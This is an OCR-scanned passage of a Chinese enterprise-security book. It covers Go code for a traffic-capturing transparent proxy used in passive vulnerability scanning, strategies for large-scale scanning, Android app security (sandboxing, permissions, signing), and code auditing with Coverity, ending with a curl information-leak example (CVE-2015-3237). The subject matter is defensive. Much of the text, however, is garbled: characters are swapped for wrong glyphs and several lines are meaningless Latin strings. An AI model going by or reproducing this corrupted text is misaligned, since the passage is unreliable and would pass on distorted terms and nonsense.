// p.AddLogger (logger .Stdout {}) 
// Attaching capture tool. 
res := make(chan capture.Response, 256) 
p.AddBodywriteCloser(capture.New(res) ) 
// Saving captured data with a goroutine. 
go func() { 
for { 
select { 
case r := <-res: 


if filter(r.ContentType, r.URL) { 


// fmt.Printin(r.Method, r.URL, r.ContentType) 


if _, err := col.Append(r); err != nil { 
log.Printf(ErrDatabaseError.Error(), err) 
} 


} 
} 


} 
}() 


cerr := make(chan error) 
// Starting proxy servers. 
go func() { 
if err := p.Start(fmt.Sprintf("%s:%d", *flagAddress, *flagPort)); err != 
nil { 
cerr <- err 


}() 
if sslEnabled { 
go func() { 
if err := p.StartTLS(fmt.Sprintf("%s:%d", *flagAddress, 
*flagSSLPort)); err != nil { 
cerr <- err 


} 
}() 


err = <-cerr 
log.Fatalf(ErrBindFailed.Error(), err) 
} 


完整 的 实现 代码 请 参考 GitHub: 


https://github.com/netxfly/Transparent-Proxy-Scanner ° 
3. 全 被 动 扫 摘 


部 署 方 式 上 类 似 于 IDS， 不 主动 候 URL， 而 是 对 B/S & C/S 双 向 交 
互 的 数据 流 进行 扫描 以 期 发 现 漏洞 ， 全 被 动 扫描 的 特点 如 下 : 


1) 不 需要 联网 ， 不 会 主动 息 取 URL， 不 会 主动 发 出 任何 数据 包 。 


2) 更 关注 漏洞 感知 ， 而 不 是 入 侵 行为 。 


何 时 需要 被 动 扫 描 ? 在 日 常 的 安全 管理 中 ， 经 常 有 一 些 业务 部 门 
会 引发 安全 管理 之 痛 ， 例 如 : 


业务 部 门 没有 经 过 安全 部 门 的 安全 扫描 和 评估 就 擅 和 目 上线， 结果 
上 线 的 服务 大 或 站 点 极 入 侵 了 。 


业务 上 线 时 确实 经 过 安全 扫描 和 评审 环节 ， 当 时 证 明 是 安全 的 ， 
但 在 业务 运营 的 过 程 中 ， 经 过 几 次 更 新 ， 把 安全 漏洞 更 新 到 生产 环境 
Bay 


y 


部 分 业务 因 人 员 更 换 或 离职 变 成 了 无 人 管理 的 业务 ， 也 有 可 能 资 
产 不 在 公司 的 资产 列表 中 ， 因 长 期 无 人 维护 被 攻击 者 外 了 空子 。 


有 了 被 动 式 扫 搬 右 后 ， 可 以 对 这 些 处 于 灰色 地 市 的 资产 进行 防 
J 


9.3 ”如何 应对 大 规模 的 等 产 扫 拉 


近年 来 云 计 算 和 大 数据 很 火 ， 不 少 广 商 的 安全 部 门 也 纷纷 引入 了 
大 数据 及 分 布 式 运算 ， 比 如 安全 日 志 分 析 、 通 过 大 数据 反 怜 虫 、 用 流 
量 镜 像 中 的 URL 进 行 Web 扫 朱 、 分 布 式 扫 摘 融 等 。 普 通 的 扫描 方式 在 
数 万 或 几 十 万 台 服 务 器 的 环境 下 会 过 到 以 下 问题 : 


1) BS ae titan NA mi IDC, EE A Be 
很 多 资源 。 


2) 大 量 的 并 发 扫描 占用 网 络 带宽 ， 高 峰 时 影响 用 户 体 验 ， 执 行 深 
度 检测 可 能 会 使 应 用 或 服务 直接 宕 掉 。 


3) 大 量 的 误 报 以 及 中 低 风险 漏洞 会 使 人 工 解读 和 后 续 整 理 难 上 加 
难 。 


因此 海量 IDC 规 模 下 漏洞 扫描 需要 寻求 高 效 的 方式 ， 总 体 思路 走 
城 少 工作 量 ， 有 几 个 方法 : 


人 简化 漏洞 评估 链 ， 减 少 需 要 扫描 的 任务 。 


=. 
Ms 


减少 漏洞 扫描 的 网 络 开销 和 被 检查 者 的 性 能 损耗 。 


N 
bn ll 


减少 漏洞 扫描 的 种 类 


UI 
Sa 


4) 减少 手工 确认 的 工作 量 。 


在 实践 中 ， 需 要 从 以 下 几 方 面 进行 优化 : 


1) 不 做 全 网 的 漏洞 扫描 ， 移 做 端口 扫描 ， 这 样 做 的 前 提 是 访问 控 
制 和 纵深 防御 做 到 位 ， 利 用 ACL 大 幅 减 少 攻击 面 ， 把 需要 漏洞 扫描 的 
端口 减少 到 22、80、443 等 ， 开 的 端口 少 了 ， 全 网 全 协议 漏洞 扫描 丈 缩 
减 为 全 网 几 个 关键 应 用 的 扫描 。 


2) 做 好 高 危 端 口 监控 ， 防 止 “计划 外 ”应 用 的 滥用 ， 这 样 漏洞 扫 摘 
这 件 事 就 瘦 号 为 端口 监控 加 关键 应 用 扫描 。 


3) 在 系统 和 应 用 扫描 上 ， 不 完全 依赖 于 网 络 扫描 器 ， 可 同时 借助 
于 本 机 agent 扫 描 ， 类 似 心脏 滴 血 的 漏洞 与 其 从 网 络 上 去 获取 扫 漏洞 ， 
不 如 在 本 地 获取 OpenSSL 的 版 本 更 人 简单。 服务 器 OS 本 地 的 agent 除 了 可 
以 扫 系 统 型 漏洞 ， 还 可 以 扫 本 地 配置 型 漏洞 ， 相 对 来 说 本 地 获取 的 信 
妃 比 网 络 获取 更 准确 ， 但 代价 是 会 消耗 服务 器 资源 ， 所 以 这 块 需要 尽 
可 能 地 减少 性 能 损耗 。 


除了 极 个 别 大 公司 ， 对 于 绝 大 多 数 企 业 而 言 ， 目 研 扫描 套 比 商业 
产品 或 成 熟 的 开源 产品 扫 摘 能 力 更 强 的 可 能 性 是 不 高 的 ， 但 是 单机 扫 
描 又 严重 影 啊 效率 ， 所 以 对 于 业务 有 一 定 规模 但 安全 团队 又 没 能 力 目 
制 扫描 右 的 公司 ， 可 以 考虑 将 现 有 的 扫描 器 改 成 分 布 式 的 ， 如 下 所 


ZR: 


.对 于 Web 漏 洞 扫 摘 ， 可 以 通过 任务 队列 的 方式 将 扫描 任务 发 给 
awVvs、arachni、w3af 等 扫描 右 ， 改 成 分 布 式 扫描 右 。 


-对 于 服务 絮 及 网 络 漏洞 扫描 ， 可 以 多 部 署 几 台 Nessus 扫 摘 右 ， 并 
配置 为 集群 模式 ， 调 用 API 进 行 大 规模 扫描 。 


94 AWE 


在 攻防 愈演愈烈 的 现代 ， 光 有 基于 静态 漏洞 规则 和 带 fuzz 功 能 的 
扫描 还 是 会 有 许多 漏洞 履 雯 不 到 ， 安 全 部 门 需 要 采取 基于 数据 的 扫 
描 ， 比 如 结合 社工 库 等 。 其 次 需要 建立 应 急 啊 应 中 心 ， 让 广大 日 幅 子 
也 参与 到 漏洞 的 挖掘 与 发 现 中 ， 尽 可 能 多 地 把 骏 露 在 外 面 的 漏洞 消炎 
fH e 


大 型 互联 网 公司 在 安全 实践 上 可 能 采取 一 些 精 俏 手段 ， 只 做 某 些 
事情 ， 前 提 是 他 们 已 经 做 了 另外 一 些 看 不 见 的 防御 措施 ， 在 某 处 精 侧 
必然 征 因 为 在 其 他 地 方 削减 了 攻击 面 ， 并 且 有 多 层次 的 防御 机 制 做 互 
补 ， 也 就 是 说 他 们 的 方案 往往 是 针对 自身 特点 的 ， 不 是 一 个 完全 意义 
上 的 通用 方案 ， 如 果 我 们 的 安全 建设 尚未 到 达 那 个 阶段 ， 直 接 和 安全 
走 在 前 治 的 大 型 互联 网 公司 看 齐 ， 采 用 人 家 “高 大 上 ”的 安全 解决 方案 
时 ， 很 有 可 能 会 发 生 刻 骨 求 剑 的 笑话 ， 需 要 实事 求 症 ， 根 据 实 际 情况 
逐步 地 建设 所 在 机 构 的 安全 体系 。 


2014 ISC“ 金 融 Wweb 应 用 系统 漏洞 分 析 方 法 ”， 林 榆 坚 


第 10 章 ”移动 应 用 安全 


互联 网 公司 的 安全 体系 基本 上 以 运 维 安全 ， 应 用 安全 ， 业 务 安全 
三 管 章 下 。 而 移动 应 用 安全 则 在 应 用 安全 中 占据 半壁 江山 ， 尤 其 对 于 
移动 端 产品 为 主 的 公司 而 言 ，SDL 的 主要 实践 对 象 就 是 移动 应 用 。 


10.1 # 


| 


入 


随 看 智能 手机 和 其 他 移动 设备 的 爆发 式 普及 ， 移 动 应 用 已 成 为 互 
联网 公司 业务 重要 的 业务 方向 。 本 章 中 会 以 移动 两 大 平台 之 一 的 安 蛙 
为 主线 ， 介 绍 移 动 应 用 所 面临 的 安全 风险 和 解决 方案 。 其 中 包含 评 们 
方法 以 及 应 对 的 思路 ， 这 些 思 路 可 以 相应 的 借鉴 于 其 他 平台 上 。 本章 
的 内 容 包括 定义 客户 靖 应 用 安全 的 范围 是 什么 ， 风 险 有 哪些 ， 攻 击 的 
来 源 ， 移 动 操 作 系统 所 提供 的 工具 。 在 了 解 这 些 基本 的 判断 之 后 ， 当 
一 些 新 的 技术 出 现 ， 我 们 仍然 可 以 用 已 有 的 标准 去 应 对 。 


10.2 ”业务 架构 分 析 


移动 应 用 很 少 会 单独 存在 ， 多 数 情况 下 会 作为 互联 网 业务 流程 中 
的 承载 平台 出 现 。 如 采 业 务 同 时 存在 传统 Web 页 面 服务 模式 ， 两 者 从 
逻辑 上 处 于 并 行 的 关系 ， 只 是 不 同 的 表现 形式 。 作 为 一 种 运行 在 用 户 
控制 设备 上 的 应 用 ， 业 务 服务 端 应 该 假设 客户 端 提交 的 信息 存在 各 种 
可 能 ， 在 设计 时 需要 关注 哪些 逻辑 适合 放 在 移动 端 ， 哪 些 逻 辑 需 要 保 
留 在 服务 端 。 涉 及 业务 核心 数据 的 行为 ， 例 如 游戏 中 的 物品 掉 落 ， 文 
付 行为 的 判断 ， 账 号 信息 的 更 改 等 都 需要 在 业务 服务 端 进行 判断 ， 而 
非 客 户 端 。 这 些 分 割 需要 从 设计 阶段 对 移动 客户 端 能 做 哪些 行为 进行 
限定 。 


从 整体 业务 角度 来 看 ， 业 务 逻 辑 为 皮 ， 移 动 应 用 端的 展示 为 毛 。 
如 何 避 免 移动 客户 端 做 不 应 承担 的 判断 ， 如 何 将 应 用 安全 和 业务 服务 
端 逻 辑 进 行 划 定 是 首先 需要 明确 的 。 


10.3 ”移动 操作 系统 安全 人 简介 


图 10-1 是 安 卓 系统 的 架构 。 和 安全 相关 的 介绍 可 以 参看 


https://source.android.com/security/index.html ， 其 中 : 


ALARM BROWSER CALCLILATOR + 
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AUDIO MANAGER + WINDOW) > VIEW SYSTEM 
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CORE LIBRARIES « 
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| AUDIO. BLUETOOTH + CAMERA + DRP 
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DRIVERS (AUDIO, SINDER {EPC}, 
BLUEFGOTH, CAMERA DISPLAY, 
KEYPAD, SHARED MEMORY, USB, 
WIFE: - POWER MANAGEMENT 


图 10-1 _ Android 体系 架构 


.硬件 设备 : 安 卓 可 运行 在 范围 广泛 的 硬件 上 上， 并且 支持 某 些 硬件 
特有 的 安全 功能 ， 例 如 ARM v6 的 eXecute-Never 功 能 。 


LEBER: 底层 为 Linux 内 核 ， 所 有 设备 资源 都 通过 该 层 提 
供 ， 包 括 相 机 ，GPS 数 据 、 蓝 牙 、 电 话 、 网 络 等 服务 。 


TAMH: 通常 使 用 Java 开 发 ， 运 行 在 Dalvik/ART 虚 拟 机 中 ， 除 
此 之 外 还 包括 一 些 二 进 制 的 组 件 。 应 用 中 不 论 是 虚拟 机 还 是 二 进 制 的 
部 分 都 在 相同 的 安全 域 ， 也 就 是 该 应 用 的 沙 盒 


现代 移动 操作 系统 和 早期 操作 系统 相 比 有 一 定 的 优势 ， 以 Windows 
为 例 ， 在 不 断 更 新 的 过 程 中 ， 会 被 过 去 的 理念 和 代码 实现 所 拖累 。 而 
安 卓 和 iOS 作 为 之 后 设计 开发 的 操作 系统 ， 在 设计 上 加 入 了 一 些 新 的 理 
念 。 此 外 现代 操作 系统 如 安 卓 中 包含 了 大 量 的 漏洞 利用 缓解 技术 ， 例 
如 ASLR，SELinux，FORTIFY_SOURCE 编 译 选项 等 技术 。 这 些 技术 能 
进一步 提高 利用 漏洞 的 难度 ， 降 低 漏 洞 利用 成 功率 。 


以 安 卓 为 例 ， 可 以 在 下 面 的 连接 中 看 到 安 曾 在 5.0 和 6.0 大 版 本 中 系 
统 对 应 的 安全 升级 项 。 


https://source.android.com/security/enhancements/enhancements50.htm 


https://source.android.com/security/enhancements/enhancements60.htm 


由 于 这 些 措施 的 运用 ， 在 未 越狱 或 root 的 设备 上 ， 更 多 的 需要 考虑 
应 用 自身 过 到 的 安全 问题 。 应 用 需要 信任 并 借用 底层 系统 提供 功能 。 


安 日 在 设计 时 已 经 考虑 并 集成 了 很 多 安全 相关 的 功能 和 组 件 ， 一 
款 普 通 的 应 用 在 设计 和 开发 过 程 中 都 可 能 用 到 这 些 。 先 来 了 解 下 一 款 
安全 应 用 的 大 体 的 结构 。 


Google 提 供 了 专门 的 Security Tips 给 开发 人 员 参 考 ， 可 以 参见 下 面 
的 连接 : 


http://developer.android.com/training/articles/security-tips.html 


其 中 的 内 容 包括 : 数据 安全 性 ， 服 务 安全 性 ， 应 用 权限 安全 性 ， 
以 及 其 他 一 些 内 容 。 


10.4 签名 管理 


为 了 确定 应 用 的 来 源 ， 无 论 安 早 还 是 iOS 都 会 对 应 用 的 签名 进行 
SE, MRAP ERMAR o ERRERA EOS P ED 
可 探 一 些 ， 千 成 这 种 情况 的 原因 很 多 ， 但 最 重要 的 一 点 是 对 应 用 市 场 
的 控制 力 。 对 于 应 用 开发 方 ， 应 该 保护 好 本 公司 用 于 应 用 签名 的 私 
钥 ， 推 荐 的 解决 方案 是 建立 签名 服务 做， 开发 者 上 传 需要 签名 的 应 
用 ,服务器 完成 签名 后 提供 下 载 。 签 名 服务 可 对 申请 应 用 签名 的 人 员 
进行 权限 控制 ， 并 包含 日 志 记 录 ， 保存 上 传 应 用 副本 等 功能 ， 这 样 做 
的 好 处 是 降低 私 钥 泄 露 的 风险 。 


另外 一 点 和 签名 相关 的 注意 项 是 ， 在 同一 家 公司 内 的 应 用 推荐 使 
用 相同 的 签名 密 钥 ， 避 免 不 同 的 应 用 使 用 不 同 的 签名 ， 这 样 不 仅 便 于 
之 后 的 发 布 和 管理 ， 在 技术 也 便于 之 后 可 能 存在 的 应 用 间 通 信 需 求 。 
无 论 iOS 中 的 Keychain Access Group 和 安 卓 权限 定义 中 要 求 的 同 签名 来 
源 (level=Signature) 都 要 求 应 用 被 相同 的 密 钥 签名 。 


10.55 ”应 用 沙 盒 及 权限 


如 之 前 所 说 ， 安 时 和 iO9S 作 为 之 后 设计 开发 的 操作 系统 ， 在 设计 上 
加 入 了 一 些 新 的 理念 ， 其 中 重要 的 一 点 是 通过 沙 盒 (Sandbox) 对 各 应 
用 间 的 权限 隔离 ， 并 在 限定 应 用 行为 边界 后 ， 通 过 按 需 申请 应 用 权限 
的 方式 规范 各 应 用 的 行为 。 这 样 就 将 单个 应 用 面临 的 风险 和 其 他 应 用 
以 及 操作 系统 相隔 离 。 

在 安 卓 系统 上 ， 在 接触 任何 系统 资源 前 ， 应 用 都 要 通过 权限 检 


查 ， 如 图 10-2 所 示 。 


Android 操作 系统 权限 检查 


图 10-2 ”应 用 权限 检查 


那么 是 如 何 实现 沙 盒 的 ? 安 卓 和 iOS 内 核 都 源 目 *nix 类 系统 内 核 ， 
对 应 用 沙 盒 的 技术 实现 都 是 基于 操作 系统 提供 的 用 户 机 制 。 每 个 在 系 


统 上 安装 的 应 用 ， 如 果 没 有 特殊 设 定 (SYSTEM 或 者 安 卓 中 SHARED- 
UID 模 式 ) ， 都 会 有 系统 分 配给 应 用 一 个 独特 的 用 户 ID (UID) ， 单 攒 
该 UID， 应 用 无 法 使 用 任何 应 用 外 的 设备 资源 。 只 有 当 应 用 在 安装 时 预 
先 申 请 了 某 些 系统 权限 后 ， 才 会 被 准许 进行 权限 对 应 的 操作 。 


以 安 卓 系统 为 例 ， 申 请 系统 权限 需要 按照 如 下 格式 在 应 用 的 
AndroidManifest.xml 文 件 中 添加 uses-permission 的 标签 段 。 


<uses-permission android:name="string"android:maxSdkVersion="integer" /> 


其 中 android: name 属 性 就 是 将 要 申请 的 权限 名 称 ， 安 时 所 提供 的 
所 有 权限 定义 的 名 称 和 说 明 可 以 在 下 面 的 连接 中 查看 : 


https://developer.android.com/reference/android/Manifest.permission.html 


此 外 ， 应 用 在 申请 系统 提供 的 权限 的 同时 ， 也 可 以 声明 创建 新 的 
自 定义 权限 ， 并 且 和 应 用 内 提供 的 一 些 模块 相关 联 。 在 下 面 的 实例 
中 ， 应 用 自 定义 了 名 为 com.example.projecDEBIT_ACCT 的 权限 ， 并 且 
和 com.example.project.FreneticActivity 模 块 关 联 ， 之 后 如 果 其 他 应 用 需 
要 调用 该 模块 ， 就 需要 在 自己 的 AndroidManifest.xml 文 件 中 声明 使 用 


com.example.project.DEBIT_ACCT: 


<manifest . . .> 
<permission android:name="com.example.project.DEBIT_ACCT" . . . /> 
<uses-permission android:name="com.example.project.DEBIT_ACCT" /> 


<application . . .> 


<activity android:name="com.example.project.FreneticActivity" 
android: permission="com.example.project .DEBIT_ACCT" 
ie AS 
</activity> 
</application> 
</manifest> 


SETH fee Ay DAT ARE, ABT EA PRA Aa, th BY 
Die HB re SOLER SE i FA A, TAE EE SOR A E 
后 各 种 组 件 。 


10.6 ”应 用 安全 风险 分 析 


在 应 用 和 业务 逻辑 已 经 刊 离 的 情况 下 ， 仍 然 可 能 存在 严重 的 安全 
风险 。 首 先 需 要 意识 到 这 些 风 险 的 根源 是 应 用 实现 形态 的 多 样 性 。 在 
提倡 模块 化 的 今天 ， 应 用 在 实现 过 程 中 会 分 为 数量 众多 的 模块 来 实 
现 ， 这 些 模块 相互 古 合 ， 同 模块 外 提供 调用 接口 ， 或 主动 或 被 动 的 接 
收 外 部 数据 并 影响 内 部 逻辑 。 通 过 梳理 这 些 接口 和 数据 来 源 ， 可 以 获 
取 到 安全 风险 的 来 源 列 表 。 


这 些 调用 接口 的 形式 是 多 样 的 ， 应 用 既 可 以 在 同系 统 下 的 组 件 层 
面 提供 各 种 服务 ， 也 可 能 开放 网 络 端 口 接受 数据 请 求 。 此 外 客户 站 应 
用 还 更 多 的 涉及 文件 内 容 的 展示 ; 各 类 型 的 视频 ， 音 频 ， 文 档 ， 图 
刻 ， 皮 肤 等 公有 和 目 定 义 文件 类 型 的 展示 ， 网 页 内 容 展示 也 给 移动 站 
应 用 市 来 了 风险 。 在 处 理 外 部 的 数据 过 程 中 ， 会 影响 应 用 内 部 的 逻 
辑 。 除 了 传统 的 数据 来 源 ， 由 于 现代 操作 系统 已 经 进行 了 应 用 间 的 权 
限 隔离 ， 如 何 避 免 同 系统 中 其 他 应 用 守 取 特定 的 权限 也 是 需要 天 广 方 
面 。 下 面 是 一 些 具体 的 风险 列表 : 


应 用 间 通 信 (IPC) : 提供 接口 的 组 件 权 限 ， 信 息 泄 露 ， 本 地 的 
数据 加 密 和 文件 权限 等 ， 以 安 摆 为 例 ，IPC 接 口 包 括 Content Provider, 


Broadcast Receiver，Activity，Service 等 形式 。 


:远程 数据 : 开放 端口 接收 数据 ， 接 收 的 各 类 型 文件 ， 应 用 的 目 动 
升级 ， 数 据 传输 明文 等 


两 类 目标 : 用户: 内 容 伪造， 导致 不 能 正确 判断 ， 程 序 : 代码 实 
MEYRA, AART, ARARA e W EERE, Bim 
要 注意 远程 来 源 数据 。 


10.7 ”安全 应 对 


对 于 大 多 数 应 用 来 说 ， 都 会 使 用 到 目 身 代码 之 外 的 三 方 逻 辑 ， 这 
些 逻 辑 可 能 存在 于 调用 库 中 或 作为 独立 组 件 补 使用， 这些 逻 辑 可 能 引 
入 安全 问题 。 对 于 三 方 的 选择 ， 建 议 选 取保 持 更 新 的 开源 项 目 ， 查 看 
项 目 升级 日 志 中 修补 过 的 安全 列表 ， 确 认 应 用 中 将 要 使 用 的 版 本 是 否 
已 经 修补 已 知 安全 问题 ， 并 订阅 此 项 目的 版 本 更 新 邮件 ， 能 在 之 后 发 
布 安全 更 新 时 第 一 时 间 评估 影响 。 


具体 到 目 身 代码 的 引入 的 问题 ， 需 要 符合 最 小 化 原则 。 举 例 来 
说 ， 对 只 需要 应 用 目 身 使 用 到 的 组 件 ， 不 提供 给 其 他 应 用 ;对 于 不 需 
要 开放 的 端口 ， 限 定 监听 在 特定 的 卫 ， 对 于 本 地 保存 的 数据 库 或 文件 
等 ， 严 格 的 限定 读 写 权限 等 。 除 此 之 外 ， 男 外 两 方面 束 是 在 需要 时 所 
供 完 善 的 认证 和 加 密 机 制 。 以 近期 的 WormHole 系 列 漏洞 为 例 ， 利 用 的 
风险 来 源 是 开放 的 端口 ， 而 这 些 端口 在 移动 网 络 上 的 访问 没有 任何 限 
制 ， 并 且 在 进行 融 危 逻辑 前 没有 做 好 认证 ， 这 就 古 最 小 化 原则 和 认证 
机 制 的 一 个 反例 。 


10.8 ”安全 评估 


1. 代 码 审计 


iOS 开 发 Xcode 环境 可 使 用 整合 的 Clang Static Analyzer， 而 安 卓 
Java 代 码 可 以 使 用 FindBugs 来 完成 代码 安全 审计 。 有 具体 审计 范围 和 使 
用 可 参考 之 后 第 11 章 “代码 审计 ”。 


2. 应 用 加 固 


目前 有 一 些 在 线 的 应 用 安全 加 固 服务 。 用 户 可 上 传 需要 加 固 的 应 
用 ， 服 务 器 接收 应 用 后 会 从 安全 ， 逆 向 和 调试 难度 等 方面 对 应 用 进行 
评 佑 ， 并 按照 用 户 需 要 提供 在 这 些 方面 完成 更 改 后 的 版 本 供 下 载 。 


10.9 ”关于 移动 认证 


为 了 方便 用 户 登 录 认 证 ， 通 稼 移动 应 用 通过 保存 登 孙 信息 或 者 加 
上 简单 的 本 地 认证 方式 (如 手势 密码 或 者 数字 PIN 码 ) 来 使 用 户 免 于 
输入 完整 的 流程 。 


以 支付 宝 为 例 ， 限 定数 额 以 下 的 付款 甚至 不 需要 认证 。 这 背后 有 
很 多 需要 背景 数据 收集 ， 从 第 一 次 正 第 登录 时 设备 本 身 的 信息 ， 包 括 
用 户 日 常 操 作 行 为 收集 的 大 数据 等 。 在 发 现 异常 时 ， 束 会 触发 完整 的 
认证 过 程 了 。 当 然 在 攻击 者 完全 控制 手机 的 情况 ， 如 采 所 有 认证 信息 
的 要 素 都 可 以 通过 手机 获取 人 到， 例如 保存 的 认证 信息 ， 动 态 认 证 短信 
等 ， 更 多 能 够 做 到 的 也 只 有 提高 攻击 的 成 本 ， 而 不 能 完全 避免 认证 信 
TAH ° 


https://www.owasp.org/images/c/ca/ASDC12- 
An_InDepth_Introduction_to_the_Android_Permissions_Modeland_How_t 


o_Secure_MultiComponent_Applications.pdf 


http://individual.utoronto.ca/jameshuang/PScout-CCS2012.pdf 


https://www.cert.org/secure-coding/research/mobile-standards- 
analysis.cfm? 


https://wv 


w.apple.com/business/docs/iOS_Security_Guide.pdf 


第 11 章 ”代码 审计 


源 代码 审计 十 一 种 提高 软件 安全 性 的 方法 。 在 之 前 的 章节 中 已 对 
SDL 有 所 介绍 ， 在 本 草 中 ， 更 偏向 于 具体 操作 。 我 们 将 了 解 一 些 代 码 
审计 的 方法 和 工具 ， 从 人 工 到 借助 工具 ， 最 后 会 通过 一 些 实例 来 看 到 
如 何 通过 现 有 的 工具 进行 审计 ， 以 及 这 些 工 具 如 何 帮 助 我 们 发 现 并 消 
除 漏洞 。 需 要 注意 的 是 ， 在 源 代 码 审计 阶段 ， 一 些 产 品 安全 设计 上 的 
问题 可 能 已 经 较 难 被 发 现 和 修改 ， 代 码 审计 更 多 是 发 现代 码 实现 上 的 


错误 和 遗漏 。 


在 代码 量 可 欣 的 情况 下 ， 并 且 没 有 很 好 的 工具 文 持 时 ， 我 们 可 以 
考虑 通过 总 结 经 验 ， 目 己 实现 相关 的 检查 工具 。 以 找到 未 正确 过 滤 数 
据 类 型 的 漏洞 为 例 ， 定 位 问题 可 以 简单 分 为 以 下 几 个 步骤 : 1) 标注 出 
ETT NAD RRQ) 标注 数据 获取 来 源 3) 标注 数据 过 滤 函 数 。 之 后 
回 朔 调 用 过 程 ， 添 加 倘 单 的 逻辑 。 


11.1 目 动 化 审计 产品 


对 于 代码 量 大 的 产品 ， 人 工 审计 明显 不 能 满足 需求 ， 这 时 需要 寻 
求 工具 的 帮助 。 代 码 分 析 技 术 由 来 已 久 ，1976 年 科罗拉多 大 学 的 Lloyd 
D.Fosdick 和 Leon J.Osterweil 在 ACM Computing Surveys 上 发 表 了 著名 的 


Data Flow Analysis in Software Reliability 论 文 ， 其 中 就 提 到 了 数据 流 分 
析 、 状 态 机 系统 、 边 界 检测 、 数 据 类 型 验证 、 探 制 流 分 析 等 技术 。 随 
春 计 算 机 语言 的 不 断 演进 ， 代 码 分 析 技 术 也 在 日 趋 完 善 。 目 前 有 数量 
众多 的 开源 和 商业 源码 审计 工具 建立 在 这 些 分 析 技 术 之 上 ， 其 中 包括 
Foritify，Coverity，FindBugs 等 。 这 些 上 自动 化 的 代码 审计 产品 能 够 满足 
对 审计 量 和 强度 的 要 求 ， 并 且 大 多 提供 和 开发 环境 相 整 合 的 组 件 ， 可 
以 融入 到 日 常 的 开发 和 编译 过 程 当 中 。 工 具 不 可 避免 会 产生 漏 报 和 误 
报 ， 在 处 理工 具 生 成 的 报告 时 ， 需 要 人 工 对 生成 的 结果 进行 验证 。 


11.2 Coverity 


Coverity 是 斯 坦 福 大 学 Dawson Engler 教 授 和 他 的 三 个 学 生发 起 完成 
的 代码 审计 工具 ， 目 前 为 包括 NASA 等 500 多 个 公司 或 政府 部 门 提供 服 
务 。 选 择 其 为 例 的 原因 有 : 1) 在 具体 的 使 用 中 感觉 误 报 率 相对 较 少 
2) 目前 有 免费 针对 开源 代码 审计 的 服务 3) 可 以 找到 相关 的 原型 论 
文 。Coverity 支 持 的 语言 有 C，C++ 和 Java， 支 持 发 现 的 问题 类 型 包括 : 


‘resources leaks 

-dereferences of NULL pointers 
‘incorrect usage of APIs 

‘use of uninitialized data 
‘memory corruptions 

-buffer overruns 

-control flow issues 

-error handling issues 


‘incorrect expressions 


‘concurrency issues 


‘insecure data handling 


‘unsafe use of signed values 


-use of resources that have been freed 


以 C/C++ 为 例 ，Coverity 的 分 析 引 警 Prevent 包 含 以 下 的 组 件 和 功能 


SN 


参见 表 11-1。 


表 11-1 Coverity 的 分 析 引 敬 Prevent 包 含 的 组 件 和 功能 
引擎 功能 
路 径流 程 引 擎 通过 构建 一 个 表示 经 过 每 一 个 函数 的 所 有 的 路 径 的 图 表 分 析 代 码 中 的 每 个 函数 的 
控制 流 
数据 追踪 引擎 用 于 分 析 从 程序 中 每 个 路 径 中 的 声明 收集 的 所 有 的 整 型 和 布尔 型 等 数据 
统计 引擎 用 于 分 析 代 码 作为 一 个 整体 的 行为 特征 
( 续 ) 
引擎 功能 


过 程 间 调用 总 结 引擎 


类 型 流程 引擎 


一 个 主要 的 创新 ， 使 得 Prevent 可 以 执行 整个 程序 的 分 析 ， 分 析 文 件 间 和 模块 间 
的 任何 层次 的 复杂 的 调用 链 
用 于 提高 C++ 分 析 中 依赖 于 类 层次 关系 的 报告 的 结果 的 精度 


虚假 路 径 引 擎 


用 于 分 析 每 个 分 支 条 件 ， 以 确定 在 当前 路 径 它 将 是 真 、 假 或 不 确定 


加 速 引擎 保存 横越 每 个 路 径 时 的 每 个 缺陷 分 析 所 收集 的 信息 ; 消除 元 余 路 径 ， 不 需要 横越 
任何 不 必要 的 路 径 来 找到 最 多 的 缺陷 
数据 传播 引擎 把 过 程 间 调用 总 结 引擎 产生 的 所 有 总 结 和 数据 追踪 引擎 记录 的 所 有 数据 汇总 起 来 ， 


是 Coverity 特有 的 、 上 下 文敏 感 的 过 程 间 分 析 能 力 的 关键 


增 量 分 析 引 擎 


通过 缓存 分 析 数 据 来 提高 性 能 ， 以 便 后 续 的 分 析 仅 需要 包含 变化 的 数据 


如 有 果 想 看 到 实际 Coverity 运 行 的 结果 ， 可 以 在 scan.coverity.com 上 浏 
多 一 些 针 对 开源 软件 进行 的 审计 结果 ， 目 前 已 经 有 为 数 众 多 的 开源 软 


件 通 过 Coverity 提 高 代码 安全 质量 。 图 11-1 是 某 个 开源 项 目的 输出 结 
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图 11-1 输出 结 


https://scan.coverity.com/o/oss_success_stories 中 包含 甄选 出 通过 


Coverity 发 现 的 漏洞 列表 ， 如 图 11-2 所 示 。 


点 击 View Defect 可 以 看 到 详细 问题 描述 ， 现 在 以 一 个 curl (一 个 利 
用 URL 语 法 在 命令 行 方式 下 工作 的 开源 文件 传输 工具 ) 中 的 漏洞 作为 
例子 进行 查看 针对 某 问 题 的 具体 展示 结果 : 


https://scan.coverity.com/o/oss_success_stories/46 ， 如 图 11-3 所 示 。 


COVERITY ia 


COPY_PASTE_ERROR Incorrect expression Setting an incorrect jump target leads to a certain 
crash if the code is exercised. Interestingly enough, 
this is a tiny corner case that was (obviously) NOT 
exercised in our... 


Jul 21, 2015 UNUSED_VALUE Incorrect expression Impact is low, just wanted to commend you! It would 
cause game actors to teleport to the wrong 
coordinates... 


elbing/arvey Memory - illegal accesses in this case, we're using a pointer to memory which is 
not guaranteed to be zero, and potentially corrupting 
the malloc arena in the process. Fixed by setting name 


图 11-2 ”漏洞 列表 


Project Name CID Checker Category Developer Description 


curl 1299430 TAINTED_SCALAR Insecure This turned out to be a security flaw, now known as CVE-2015-3237. Full 
data description here: http://curl.haxx.se/docs/adv_20150617B.html It could make a 
handling malicious server fool a client to send off data from memory it didn't intend to. 


7. var_assign smb.c:781 
8. lower_bounds smb.c:785 


10. lower_bounds smb.c:785 


len = Curl_readie_le(((unsigned char *) msg) + 6. tainted_data_return smb.c:781 
sizeof(struct smb_header) + 11); 3 

off = Curl readl6 le(((unsigned char *) msg) + 11 tainted_data smb c786 
sizeof(struct smb header) + 13); 


result - Curl_client_write(conn, 
(char *)msg + off + sizeof(unsigned int), 
len); 


图 11-3 ”详细 问题 描述 


是 一 个 存在 于 curl 中 的 信息 泄露 漏洞 。 由 于 没有 对 SMB 服 务 端 返 
回 的 长 度数 据 进行 合法 性 检查 ， 通 过 构造 特定 网 络 包 数 据 ， 将 导致 curl 
客户 端 发 送出 非 预期 的 数据 ， 导 致 信息 泄露 。 该 漏洞 也 已 被 修复 ， 分 
配 的 CVE 编 号 为 CVE-2015-3237， 公 告 见 


